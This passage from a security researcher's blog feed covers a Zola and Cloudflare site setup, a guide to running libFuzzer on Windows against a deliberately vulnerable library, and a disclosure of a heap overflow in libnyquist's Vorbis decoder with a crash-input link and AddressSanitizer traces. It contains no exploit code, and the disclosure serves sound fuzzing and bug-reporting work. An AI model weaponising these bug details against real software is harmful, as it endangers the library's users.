2024-05-03T00:00:00+00:00 https://ekse.github.io/blog/feed.xml 2024-05-03T00:00:00+00:00 2024-05-03T00:00:00+00:00 https://ekse.github.io/blog/my-blog-setup/ <p>I'm trying to get back into the habit of writing posts and I figured I could explain my current setup for this blog. This is meant both to help people that would be interested in standing up a similar site and help me to remember how this thing even works.</p> <h2 id="my-current-setup-zola-and-cloudflare-pages">My current setup: Zola and Cloudflare Pages</h2> <h3 id="zola">Zola</h3> <p><a rel="nofollow noreferrer external" href="https://www.getzola.org">Zola</a> is a static site generator. In a nutshell, you edit Markdown files, generate the content with <code>zola build</code> and host the html files wherever you want. You can use <code>zola serve</code> to start a local web server, the content is hot reloaded everytime you save. The source code of my blog is hosted in a <a rel="nofollow noreferrer external" href="https://github.com/ekse/zola-site">github repo</a>.</p> <p>The Zola website provides a good selection of <a rel="nofollow noreferrer external" href="https://www.getzola.org/themes/">themes</a>. I went with <a rel="nofollow noreferrer external" href="https://www.getzola.org/themes/serene/">Serene</a> to which I did very light changes to the font and color schemes.</p> <h3 id="cloudflare-pages">Cloudflare Pages</h3> <p>For the hosting I'm using <a rel="nofollow noreferrer external" href="https://pages.cloudflare.com/">Cloudflare Pages</a>. When you create a site, you connect it to a git repository (github or gitlab), specify the framework to use and that's pretty much it. You get a <code>pages.dev</code> domain for your site, you can also define a custom domain. The free plan offers unlimited requests and bandwidth, and 500 builds per month which is plenty for my needs. Cloudflare Pages now supports Zola out of the box.</p> <p>Every time I push to the <code>main</code> branch it deploys the site. Cloudflare generates preview links like <code>ea49e660.ekse.pages.dev</code> when pushing to branches that begin with 'preview-'.</p> <p><img src="/assets/blog_setup/cloudflare1.png" alt="" /></p> <p>My experience has been quite pleasant so far, the site takes less than a minute to deploy. I found the management panel a bit confusing at first but I like it now that got used to where things are.</p> <h3 id="umami">Umami</h3> <p><a rel="nofollow noreferrer external" href="https://umami.is/">Umami</a> is a privacy preserving analytics service. You get page views by path and referrers which is frankly all I really care about. You can also see what browsers, platform (desktop or mobile) and countries visits are coming from which is nice to see. The interface is clean and very simple to use. The free tier includes 10K monthly events which is again more than enough for my needs.</p> <p><img src="/assets/blog_setup/umami.jpg" alt="" /></p> <p>Adding it was quite straightforward as the Serene theme supports it. I created my instance, enabled in config.toml, set my website_id and url in theme.toml and that was it.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="toml"><span class="giallo-l"><span style="color: #616E88;"># in config.toml</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">[</span><span>extra</span><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>analytics</span><span style="color: #ECEFF4;"> = &quot;</span><span style="color: #A3BE8C;">umami</span><span style="color: #ECEFF4;">&quot;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #616E88;"># in templates/theme.toml</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">[</span><span>extra.umami</span><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span>website_id</span><span style="color: #ECEFF4;"> = &quot;</span><span style="color: #A3BE8C;">8a6655dc-02d7-4510-befc-e854f7da87a6</span><span style="color: #ECEFF4;">&quot;</span></span> <span class="giallo-l"><span>src</span><span style="color: #ECEFF4;"> = &quot;</span><span style="color: #A3BE8C;">https://analytics.us.umami.is/script.js</span><span style="color: #ECEFF4;">&quot;</span></span></code></pre><h2 id="previous-platforms">Previous platforms</h2> <p>I used different components over the years to host my blog, I'll briefly describe them and why I decided to change.</p> <h3 id="blogger">Blogger</h3> <p>I started my blog on <a rel="nofollow noreferrer external" href="https://www.blogger.com">Blogger</a>. It was fairly simple to create posts with the graphical editor but customization was done in html which wasn't great. I had to do syntax highlighting of code manually with a javascript library, which is something you get out of the box with tools like Jekyll, Zola and Hugo.</p> <p>At some point Google also redesigned the look and feel of Blogger which in my opinion was worst than the previous look.</p> <h3 id="github-pages">Github Pages</h3> <p>My next platform was <a rel="nofollow noreferrer external" href="https://pages.github.com/">Github Pages</a>. It's honestly quite cool, you create a repo named <code>yourusername.github.io</code>, add markdown pages to it and you automatically get a site on that domain.</p> <p>The part that wasn't as nice is that it uses Jekyll which is in Ruby, I remember often losing time getting the packages to work locally with <code>bundler</code>. (I later learned that it is also possible to host content generated by other tools with some <a rel="nofollow noreferrer external" href="https://www.getzola.org/documentation/deployment/github-pages/">Github Actions hackery</a>).</p> <p>As a fan of Rust I decided to try Zola at some point. A neat advantage it has over Jekyll is that you can use a precompiled binary which saves time fighting with dependencies.</p> <h3 id="hosting-on-a-vm-on-oracle-cloud-free-tier">Hosting on a VM on Oracle Cloud Free Tier</h3> <p>Around the same time that I started experimenting with Zola, I learned that you can get a free ARM virtual machine with the free tier of <a rel="nofollow noreferrer external" href="https://www.oracle.com/ca-en/cloud/free/">Oracle Cloud</a>.</p> <p>My setup was to clone my git repository on that VM, generate the content and serve it with nginx. I would generally work on the content locally, but when I wanted to do quick changes I would edit the files directly on the VM, serve it with <code>zola serve</code> and browse from my system with an ssh port forward.</p> <p>This setup worked well but its not as convenient as a <em>push and deploy</em> system like Github Pages and Cloudflare Pages. It also felt wasteful to have a VM spun up all the time for a blog that barely gets any traffic.</p> <h3 id="cloudflare-web-analytics">Cloudflare Web Analytics</h3> <p>I gave <a rel="nofollow noreferrer external" href="https://www.cloudflare.com/en-ca/web-analytics/">Cloudflare Web Analytics</a> a try, it is built as a privacy-preserving alternative to Google Analytics. However to achieve its privacy guarantees, Cloudflare bundles visit data together, for sites like mine that get rare visits the data wasn't really useful, I would see that my site had a number of visits in the past week but couldn't see which pages were visited.</p> 2019-08-07T00:00:00+00:00 2019-08-07T00:00:00+00:00 https://ekse.github.io/blog/libfuzzer-visual-studio/ <p>libFuzzer is awesome and is currently my go-to fuzzing tool, so I was super excited last week when I learned that both <a rel="nofollow noreferrer external" href="https://llvm.org/docs/LibFuzzer.html">libFuzzer</a> and <a rel="nofollow noreferrer external" href="https://clang.llvm.org/docs/AddressSanitizer.html">AddressSanitizer</a> are now supported on Windows! I put together a couple notes on how I got it to work with a cmake + Visual Studio project.</p> <h2 id="configuration-steps">Configuration steps</h2> <p>The first step is to install a snapshot of clang 9 which can be downloaded from <a rel="nofollow noreferrer external" href="https://llvm.org/builds/">https://llvm.org/builds/</a>.</p> <p>We also need to install the clang support for Visual Studio. In Visual Studio Installer, it can be found under "Individual Components" as "C++ Clang-cl for v142 build tools".</p> <h2 id="project-generation">Project generation</h2> <p>The next step is to generate the cmake build using the <code>ClangCl</code> toolset. Here <code>WASM_FUZZING</code> is a flag specific to <code>libwasm-vulnerable</code> that is used to build the fuzzers (see the project <a rel="nofollow noreferrer external" href="https://github.com/ekse/libwasm-vulnerable/blob/master/CMakeLists.txt#L18">CMakeLists.txt</a> for details).</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>cmake -G &quot;Visual Studio 16&quot; -T ClangCl -DWASM_FUZZING=ON ../..</span></span></code></pre> <p>Next, open the <code>libwasm.sln</code> project in Visual Studio. A limitation of libFuzzer on Windows is that incremental builds are not supported. To avoid this issue, I build the project in "Release" mode.</p> <p>Another limitation of libFuzzer on Windows is that it only supports the /MT runtime library (it will fail to compile with /MD or /MTd). We need to change it for both libwasm and FuzzLibwasm. To do that, right-click on the project, select "Properties", then under "Configuration properties" / "C/C++" / "Code generation", set "Runtime library" to "Multithread /MT".</p> <p>The last thing we need to fix is adding the libFuzzer libraries as they are not automatically added. To do that, open the Properties page of FuzzLibwasm, go to "Linking" / "Entries" and open "Additional Dependencies". Add the following lines (the paths might be different on your system).</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>C:\Program Files\LLVM\lib\clang\9.0.0\lib\windows\clang_rt.asan-preinit-x86_64.lib</span></span> <span class="giallo-l"><span>C:\Program Files\LLVM\lib\clang\9.0.0\lib\windows\clang_rt.asan-x86_64.lib</span></span> <span class="giallo-l"><span>C:\Program Files\LLVM\lib\clang\9.0.0\lib\windows\clang_rt.asan_cxx-x86_64.lib</span></span> <span class="giallo-l"><span>C:\Program Files\LLVM\lib\clang\9.0.0\lib\windows\clang_rt.fuzzer-x86_64.lib</span></span></code></pre> <p>FuzzLibwasm should now build and run normally (and should find a crash almost right away).</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>C:\projects\Security\libwasm-vulnerable\builds\Fuzzing2&gt;fuzzers\Release\FuzzLibwasm.exe</span></span> <span class="giallo-l"><span>INFO: Seed: 3746082236</span></span> <span class="giallo-l"><span>INFO: Loaded 1 modules (331 inline 8-bit counters): 331 [00007FF72401B908, 00007FF72401BA53),</span></span> <span class="giallo-l"><span>INFO: Loaded 1 PC tables (331 PCs): 331 [00007FF723FF3EA8,00007FF723FF5358),</span></span> <span class="giallo-l"><span>INFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes</span></span> <span class="giallo-l"><span>INFO: A corpus is not provided, starting from an empty corpus</span></span> <span class="giallo-l"><span>#2 INITED cov: 6 ft: 6 corp: 1/1b exec/s: 0 rss: 62Mb</span></span> <span class="giallo-l"><span>=================================================================</span></span> <span class="giallo-l"><span>==20928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x11e35af80893 at pc 0x7ff723e68a02 bp 0x001618efee90 sp 0x001618efeed8</span></span> <span class="giallo-l"><span>READ of size 1 at 0x11e35af80893 thread T0</span></span> <span class="giallo-l"><span> #0 0x7ff723e68a01 in WasmDisasm_NextInstruction+0x6d1 (C:\projects\Security\libwasm-vulnerable\builds\Fuzzing2\fuzzers\Release\FuzzLibwasm.exe+0x140008a01)</span></span> <span class="giallo-l"><span> #1 0x7ff723e61115 in LLVMFuzzerTestOneInput+0x65 (C:\projects\Security\libwasm-vulnerable\builds\Fuzzing2\fuzzers\Release\FuzzLibwasm.exe+0x140001115)</span></span> <span class="giallo-l"><span> #2 0x7ff723eb0edd in fuzzer::Fuzzer::ExecuteCallback C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:553</span></span> <span class="giallo-l"><span> #3 0x7ff723eb0296 in fuzzer::Fuzzer::RunOne C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:469</span></span> <span class="giallo-l"><span> #4 0x7ff723eb2030 in fuzzer::Fuzzer::MutateAndTestOne C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:695</span></span> <span class="giallo-l"><span> #5 0x7ff723eb2df5 in fuzzer::Fuzzer::Loop C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:831</span></span> <span class="giallo-l"><span> #6 0x7ff723ea725f in fuzzer::FuzzerDriver C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerDriver.cpp:825</span></span> <span class="giallo-l"><span> #7 0x7ff723ef11d2 in main C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerMain.cpp:19</span></span> <span class="giallo-l"><span> #8 0x7ff723f49b5b in __scrt_common_main_seh d:\agent\_work\3\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288</span></span> <span class="giallo-l"><span> #9 0x7ffa07227973 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.dll+0x180017973)</span></span> <span class="giallo-l"><span> #10 0x7ffa0913a270 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18006a270)</span></span> <span class="giallo-l"><span>0x11e35af80893 is located 0 bytes to the right of 3-byte region [0x11e35af80890,0x11e35af80893)</span></span> <span class="giallo-l"><span>allocated by thread T0 here:</span></span> <span class="giallo-l"><span> #0 0x7ff723e96924 in operator new[] C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\asan\asan_new_delete.cc:102</span></span> <span class="giallo-l"><span> #1 0x7ff723eb0df1 in fuzzer::Fuzzer::ExecuteCallback C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:538</span></span> <span class="giallo-l"><span> #2 0x7ff723eb0296 in fuzzer::Fuzzer::RunOne C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:469</span></span> <span class="giallo-l"><span> #3 0x7ff723eb2030 in fuzzer::Fuzzer::MutateAndTestOne C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:695</span></span> <span class="giallo-l"><span> #4 0x7ff723eb2df5 in fuzzer::Fuzzer::Loop C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerLoop.cpp:831</span></span> <span class="giallo-l"><span> #5 0x7ff723ea725f in fuzzer::FuzzerDriver C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerDriver.cpp:825</span></span> <span class="giallo-l"><span> #6 0x7ff723ef11d2 in main C:\src\llvm_package_363781\llvm\projects\compiler-rt\lib\fuzzer\FuzzerMain.cpp:19</span></span> <span class="giallo-l"><span> #7 0x7ff723f49b5b in __scrt_common_main_seh d:\agent\_work\3\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288</span></span> <span class="giallo-l"><span> #8 0x7ffa07227973 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.dll+0x180017973)</span></span> <span class="giallo-l"><span> #9 0x7ffa0913a270 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18006a270)</span></span> <span class="giallo-l"><span>SUMMARY: AddressSanitizer: heap-buffer-overflow (C:\projects\Security\libwasm-vulnerable\builds\Fuzzing2\fuzzers\Release\FuzzLibwasm.exe+0x140008a01) in WasmDisasm_NextInstruction+0x6d1</span></span> <span class="giallo-l"><span>Shadow bytes around the buggy address:</span></span> <span class="giallo-l"><span> 0x041bc65700c0: fa fa 05 fa fa fa fd fa fa fa 06 fa fa fa 00 00</span></span> <span class="giallo-l"><span> 0x041bc65700d0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 fa</span></span> <span class="giallo-l"><span> 0x041bc65700e0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa fd fd</span></span> <span class="giallo-l"><span> 0x041bc65700f0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa</span></span> <span class="giallo-l"><span> 0x041bc6570100: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa</span></span> <span class="giallo-l"><span>=&gt;0x041bc6570110: fa fa[03]fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x041bc6570120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x041bc6570130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x041bc6570140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x041bc6570150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x041bc6570160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span>Shadow byte legend (one shadow byte represents 8 application bytes):</span></span> <span class="giallo-l"><span> Addressable: 00</span></span> <span class="giallo-l"><span> Partially addressable: 01 02 03 04 05 06 07</span></span> <span class="giallo-l"><span> Heap left redzone: fa</span></span> <span class="giallo-l"><span> Freed heap region: fd</span></span> <span class="giallo-l"><span> Stack left redzone: f1</span></span> <span class="giallo-l"><span> Stack mid redzone: f2</span></span> <span class="giallo-l"><span> Stack right redzone: f3</span></span> <span class="giallo-l"><span> Stack after return: f5</span></span> <span class="giallo-l"><span> Stack use after scope: f8</span></span> <span class="giallo-l"><span> Global redzone: f9</span></span> <span class="giallo-l"><span> Global init order: f6</span></span> <span class="giallo-l"><span> Poisoned by user: f7</span></span> <span class="giallo-l"><span> Container overflow: fc</span></span> <span class="giallo-l"><span> Array cookie: ac</span></span> <span class="giallo-l"><span> Intra object redzone: bb</span></span> <span class="giallo-l"><span> ASan internal: fe</span></span> <span class="giallo-l"><span> Left alloca redzone: ca</span></span> <span class="giallo-l"><span> Right alloca redzone: cb</span></span> <span class="giallo-l"><span> Shadow gap: cc</span></span> <span class="giallo-l"><span>==20928==ABORTING</span></span> <span class="giallo-l"><span>MS: 2 InsertByte-InsertByte-; base unit: adc83b19e793491b1c6ea0fd8b46cd9f32e592fc</span></span> <span class="giallo-l"><span>0x11,0xa,0x2d,</span></span> <span class="giallo-l"><span>\x11\x0a-</span></span> <span class="giallo-l"><span>artifact_prefix=&#39;./&#39;; Test unit written to ./crash-dac57cac066b9b5ec2f3f5f64595a40609d52e80</span></span> <span class="giallo-l"><span>Base64: EQot</span></span></code></pre> 2019-07-30T00:00:00+00:00 2019-07-30T00:00:00+00:00 https://ekse.github.io/blog/libnyquist-heap-overflow/ <h2 id="summary">Summary</h2> <p><a rel="nofollow noreferrer external" href="https://github.com/ddiakopoulos/libnyquist">libnyquist</a> is a cross platform C++11 library for decoding audio (mp3, wav, ogg, opus, flac, etc). A heap overflow can happen in VorbisDecoderInternal::readInternal when the library attempts to read more frames than the allocated capacity of <code>AudioData-&gt;samples</code>.</p> <p>github issue: <a rel="nofollow noreferrer external" href="https://github.com/ddiakopoulos/libnyquist/issues/40">https://github.com/ddiakopoulos/libnyquist/issues/40</a> crash input: <a rel="nofollow noreferrer external" href="https://drive.google.com/open?id=10xpTDUrHzJLFknsY4bF8333YpvnMHZJc">crash-7f190cd04b5fbf6f813db4447b5010e63867fe6a.ogg</a></p> <p>For reference, the fuzzer can be found on my <a rel="nofollow noreferrer external" href="https://github.com/ekse/libnyquist/tree/fuzzing">fuzzing</a> branch. The provided sample also crashes the sample <code>libnyquist-examples</code> that is provided with libnyquist.</p> <h2 id="detailed-analysis">Detailed analysis</h2> <p>libnyquist can write past the capacity of <code>samples</code> in AudioData. With the provided crash sample, this happens when <code>totalFramesRead</code> reaches the value 19840.</p> <p><code>VorbisDecoderInternal::readInternal</code> contains the following code. The write overflow happens in <code>d-&gt;samples[totalFramesRead] = buffer[ch][i]</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #81A1C1;">for</span><span style="color: #ECEFF4;"> (</span><span style="color: #81A1C1;">int</span><span> i </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> i </span><span style="color: #81A1C1;">&lt;</span><span> framesRead</span><span style="color: #81A1C1;">; ++</span><span>i</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">{</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">int</span><span> ch </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> ch </span><span style="color: #81A1C1;">&lt;</span><span> d</span><span style="color: #81A1C1;">-&gt;</span><span>channelCount</span><span style="color: #81A1C1;">;</span><span> ch</span><span style="color: #81A1C1;">++</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {</span></span> <span class="giallo-l"><span> d</span><span style="color: #81A1C1;">-&gt;</span><span>samples</span><span style="color: #ECEFF4;">[</span><span>totalFramesRead</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;"> =</span><span> buffer</span><span style="color: #ECEFF4;">[</span><span>ch</span><span style="color: #ECEFF4;">][</span><span>i</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span> totalFramesRead</span><span style="color: #81A1C1;">++;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span></code></pre> <p>The size of samples is set in VorbisDecoderInternal::loadAudioData.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span>auto totalSamples </span><span style="color: #81A1C1;">= size_t</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">getTotalSamples</span><span style="color: #ECEFF4;">())</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span>d</span><span style="color: #81A1C1;">-&gt;</span><span>samples.</span><span style="color: #88C0D0;">resize</span><span style="color: #ECEFF4;">(</span><span>totalSamples </span><span style="color: #81A1C1;">*</span><span> d</span><span style="color: #81A1C1;">-&gt;</span><span>channelCount</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span></code></pre> <p><code>getTotalSamples</code> is defined as follows.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #81A1C1;">inline int64_t</span><span style="color: #88C0D0;"> getTotalSamples</span><span style="color: #ECEFF4;">()</span><span style="color: #81A1C1;"> const</span><span style="color: #ECEFF4;"> {</span><span style="color: #81A1C1;"> return int64_t</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">ov_pcm_total</span><span style="color: #ECEFF4;">(</span><span>const_cast</span><span style="color: #81A1C1;">&lt;</span><span>OggVorbis_File </span><span style="color: #81A1C1;">*&gt;</span><span style="color: #ECEFF4;">(</span><span>fileHandle</span><span style="color: #ECEFF4;">),</span><span style="color: #81A1C1;"> -</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span><span style="color: #ECEFF4;"> }</span></span></code></pre> <p>In the crash sample, <code>totalSamples</code> is 9920, d-&gt;channelCount is 2, so samples is set to size 19840.</p> <p>AddressSanitizer report:</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>==12481==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000027e00 at pc 0x000000822064 bp 0x7ffcb604acd0 sp 0x7ffcb604acc8</span></span> <span class="giallo-l"><span>WRITE of size 4 at 0x631000027e00 thread T0</span></span> <span class="giallo-l"><span> #0 0x822063 in VorbisDecoderInternal::readInternal(unsigned long, unsigned long) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:105:49</span></span> <span class="giallo-l"><span> #1 0x820788 in VorbisDecoderInternal::loadAudioData(void*, ov_callbacks) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:248:14</span></span> <span class="giallo-l"><span> #2 0x81ef9a in VorbisDecoderInternal::VorbisDecoderInternal(nqr::AudioData*, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:56:13</span></span> <span class="giallo-l"><span> #3 0x81ea87 in nqr::VorbisDecoder::LoadFromBuffer(nqr::AudioData*, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:264:27</span></span> <span class="giallo-l"><span> #4 0x5347bc in nqr::NyquistIO::Load(nqr::AudioData*, std::__cxx11::basic_string&lt;char, std::char_traits&lt;char&gt;, std::allocator&lt;char&gt; &gt; const&amp;, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/Common.cpp:133:22</span></span> <span class="giallo-l"><span> #5 0x52a6b3 in Fuzz_Decoder(unsigned char const*, unsigned long) /home/ekse/git/libnyquist/builds/Fuzzing/../../fuzzers/FuzzNyquist.cpp:20:12</span></span> <span class="giallo-l"><span> #6 0x52ad5b in LLVMFuzzerTestOneInput /home/ekse/git/libnyquist/builds/Fuzzing/../../fuzzers/FuzzNyquist.cpp:28:5</span></span> <span class="giallo-l"><span> #7 0x43231a in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x43231a)</span></span> <span class="giallo-l"><span> #8 0x424c5c in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x424c5c)</span></span> <span class="giallo-l"><span> #9 0x42a0e1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x42a0e1)</span></span> <span class="giallo-l"><span> #10 0x44c702 in main (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x44c702)</span></span> <span class="giallo-l"><span> #11 0x7fadf79f1b6a in __libc_start_main /build/glibc-KRRWSm/glibc-2.29/csu/../csu/libc-start.c:308:16</span></span> <span class="giallo-l"><span> #12 0x423539 in _start (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x423539)</span></span> <span class="giallo-l"><span>0x631000027e00 is located 0 bytes to the right of 79360-byte region [0x631000014800,0x631000027e00)</span></span> <span class="giallo-l"><span>allocated by thread T0 here:</span></span> <span class="giallo-l"><span> #0 0x527512 in operator new(unsigned long) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x527512)</span></span> <span class="giallo-l"><span> #1 0x56ae67 in __gnu_cxx::new_allocator&lt;float&gt;::allocate(unsigned long, void const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27</span></span> <span class="giallo-l"><span> #2 0x56ad6c in std::allocator_traits&lt;std::allocator&lt;float&gt; &gt;::allocate(std::allocator&lt;float&gt;&amp;, unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436:20</span></span> <span class="giallo-l"><span> #3 0x56a409 in std::_Vector_base&lt;float, std::allocator&lt;float&gt; &gt;::_M_allocate(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:296:20</span></span> <span class="giallo-l"><span> #4 0x5696b5 in std::vector&lt;float, std::allocator&lt;float&gt; &gt;::_M_default_append(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:604:34</span></span> <span class="giallo-l"><span> #5 0x566e8c in std::vector&lt;float, std::allocator&lt;float&gt; &gt;::resize(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:827:4</span></span> <span class="giallo-l"><span> #6 0x82076f in VorbisDecoderInternal::loadAudioData(void*, ov_callbacks) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:246:20</span></span> <span class="giallo-l"><span> #7 0x81ef9a in VorbisDecoderInternal::VorbisDecoderInternal(nqr::AudioData*, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:56:13</span></span> <span class="giallo-l"><span> #8 0x81ea87 in nqr::VorbisDecoder::LoadFromBuffer(nqr::AudioData*, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:264:27</span></span> <span class="giallo-l"><span> #9 0x5347bc in nqr::NyquistIO::Load(nqr::AudioData*, std::__cxx11::basic_string&lt;char, std::char_traits&lt;char&gt;, std::allocator&lt;char&gt; &gt; const&amp;, std::vector&lt;unsigned char, std::allocator&lt;unsigned char&gt; &gt; const&amp;) /home/ekse/git/libnyquist/builds/Fuzzing/../../src/Common.cpp:133:22</span></span> <span class="giallo-l"><span> #10 0x52a6b3 in Fuzz_Decoder(unsigned char const*, unsigned long) /home/ekse/git/libnyquist/builds/Fuzzing/../../fuzzers/FuzzNyquist.cpp:20:12</span></span> <span class="giallo-l"><span> #11 0x52ad5b in LLVMFuzzerTestOneInput /home/ekse/git/libnyquist/builds/Fuzzing/../../fuzzers/FuzzNyquist.cpp:28:5</span></span> <span class="giallo-l"><span> #12 0x43231a in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x43231a)</span></span> <span class="giallo-l"><span> #13 0x424c5c in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x424c5c)</span></span> <span class="giallo-l"><span> #14 0x42a0e1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x42a0e1)</span></span> <span class="giallo-l"><span> #15 0x44c702 in main (/home/ekse/git/libnyquist/builds/Fuzzing/fuzzers/FuzzNyquist+0x44c702)</span></span> <span class="giallo-l"><span> #16 0x7fadf79f1b6a in __libc_start_main /build/glibc-KRRWSm/glibc-2.29/csu/../csu/libc-start.c:308:16</span></span> <span class="giallo-l"><span>SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ekse/git/libnyquist/builds/Fuzzing/../../src/VorbisDecoder.cpp:105:49 in VorbisDecoderInternal::readInternal(unsigned long, unsigned long)</span></span> <span class="giallo-l"><span>Shadow bytes around the buggy address:</span></span> <span class="giallo-l"><span> 0x0c627fffcf70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span></span> <span class="giallo-l"><span> 0x0c627fffcf80: 00 00 00 00 00 00 